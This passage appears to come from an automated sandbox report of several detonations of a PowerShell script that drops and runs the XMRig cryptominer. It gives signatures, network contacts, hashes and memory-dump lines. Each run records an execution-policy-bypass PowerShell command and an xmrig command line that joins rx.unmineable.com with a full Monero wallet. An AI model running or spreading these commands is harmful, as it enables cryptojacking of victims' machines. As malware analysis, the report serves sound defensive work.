memory/4572-78-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-79-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-80-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-81-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
memory/4572-82-0x00007FF7D7B00000-0x00007FF7D8733000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
293s
Max time network
306s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2400 wrote to memory of 3588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2400 wrote to memory of 3588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| IE | 52.111.236.22:443 | tcp |
Files
memory/2400-0-0x00007FFF21033000-0x00007FFF21035000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcs4sksj.jwv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2400-9-0x0000022E6B040000-0x0000022E6B062000-memory.dmp
memory/2400-10-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/2400-11-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/2400-12-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/2400-13-0x00007FFF21033000-0x00007FFF21035000-memory.dmp
memory/2400-14-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/2400-16-0x0000022E6B0F0000-0x0000022E6B102000-memory.dmp
memory/2400-17-0x0000022E6B0E0000-0x0000022E6B0EA000-memory.dmp
memory/2400-20-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3588-49-0x0000019696D60000-0x0000019696D80000-memory.dmp
memory/2400-50-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp
memory/3588-51-0x0000019696DB0000-0x0000019696DD0000-memory.dmp
memory/3588-52-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-53-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-54-0x0000019698590000-0x00000196985B0000-memory.dmp
memory/3588-55-0x00000196985B0000-0x00000196985D0000-memory.dmp
memory/3588-56-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-57-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-58-0x0000019698590000-0x00000196985B0000-memory.dmp
memory/3588-59-0x00000196985B0000-0x00000196985D0000-memory.dmp
memory/3588-60-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-61-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-62-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-63-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-64-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-65-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-66-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-67-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-68-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-69-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-70-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-71-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-72-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-73-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-74-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-75-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-76-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-77-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-78-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-79-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-80-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-81-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
memory/3588-82-0x00007FF7B0A90000-0x00007FF7B16C3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
298s
Max time network
300s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4604 wrote to memory of 2924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4604 wrote to memory of 2924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
Files
memory/4604-4-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp
memory/4604-5-0x000002369AC70000-0x000002369AC92000-memory.dmp
memory/4604-8-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-9-0x00000236B3330000-0x00000236B33A6000-memory.dmp
memory/4604-10-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plcgwmlh.hqb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4604-25-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-29-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp
memory/4604-30-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-31-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-32-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-52-0x00000236B3100000-0x00000236B3112000-memory.dmp
memory/4604-65-0x00000236B30E0000-0x00000236B30EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2924-94-0x000001AED6FC0000-0x000001AED6FE0000-memory.dmp
memory/2924-95-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-96-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-97-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-98-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-99-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-100-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-101-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-102-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-103-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-104-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-105-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-106-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-107-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-108-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-109-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-110-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-111-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-112-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-113-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-114-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-115-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-116-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-117-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-118-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
memory/2924-119-0x00007FF69C0E0000-0x00007FF69CD13000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
297s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4268 wrote to memory of 8 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4268 wrote to memory of 8 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
memory/4268-0-0x00007FFEE9033000-0x00007FFEE9035000-memory.dmp
memory/4268-6-0x0000020B43EE0000-0x0000020B43F02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_swd2gf1t.dv0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4268-11-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-12-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-13-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-14-0x00007FFEE9033000-0x00007FFEE9035000-memory.dmp
memory/4268-16-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-17-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-18-0x0000020B44150000-0x0000020B44162000-memory.dmp
memory/4268-19-0x0000020B43EB0000-0x0000020B43EBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/8-50-0x0000027CCCB50000-0x0000027CCCB70000-memory.dmp
memory/8-51-0x0000027CCCBA0000-0x0000027CCCBC0000-memory.dmp
memory/8-52-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-53-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-54-0x0000027CCCBE0000-0x0000027CCCC00000-memory.dmp
memory/8-55-0x0000027CCCBC0000-0x0000027CCCBE0000-memory.dmp
memory/8-56-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/4268-57-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/8-58-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-59-0x0000027CCCBE0000-0x0000027CCCC00000-memory.dmp
memory/8-60-0x0000027CCCBC0000-0x0000027CCCBE0000-memory.dmp
memory/8-61-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-62-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-63-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-64-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-65-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-66-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-67-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-68-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-69-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-70-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-71-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-72-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-73-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-74-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-75-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-76-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-77-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-78-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-79-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-80-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-81-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-82-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-83-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
293s
Max time network
280s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
